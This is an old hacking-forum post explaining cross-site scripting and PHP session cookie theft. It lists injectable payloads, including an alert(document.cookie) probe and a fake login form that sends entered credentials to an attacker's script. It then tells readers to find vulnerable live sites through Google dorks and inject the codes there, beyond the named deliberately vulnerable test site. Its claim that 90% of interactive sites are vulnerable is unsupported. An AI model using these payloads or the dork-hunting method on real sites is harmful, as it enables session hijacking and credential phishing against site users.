|blackhawk||Date: Monday, 2012-02-13, 6:03 PM | Message # 1|
A cookie is a variable that is used to store login credentials and to keep the user logged in.Whenever your cookies are cleared you can no longer stay logged in any site.On a php powered page the cookie looks like PHPSESSID.Whenever a webpage uses PHPSESSID to authenticate its users,the cookie can be stolen using cross site scripting attack.In this way the attacker can spoof using one cookie and hijack his session.
XSS can be considered as a dangerous exploit as most of the web pages are user interactive.For the purpose of interaction the webpage provides fields for comments,search and even feedback.90% percent of user interactive websites are vunerable to this type of attack though some percentage of sites have a high risk of exploitation.
For testing XSS you can inject the script like
into search fields,comment fields and feedback forms.If you find the output of the page which looks like a large heading that reads welcome or an alertbox that say's hello.
To give it a try ,click the link http://testasp.vulnweb.com/Search.asp
Insert the below codes:
code 1: <h1>XSSED</h1>
code 2: <script>alert("XSSED")</script>
code 3: <img src="URL OF THE IMAGE"></img>
code 4: <br><br>Login to proceed:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=10 name=login></td></tr><tr><td>Password:</td><td><input type=text length=10 name=password></td></tr></table><input type=submit value=LOGIN></form>
Where the destination.asp can be script that stores the data entered in the fields.
This code can be injected directly into the url as follows:
code 5: <script>alert(document.cookie)</script>
To find the vunerable pages we can use some XSS dorks like "inurl:search.php?q="
Type any of the dorks into google and input the codes given.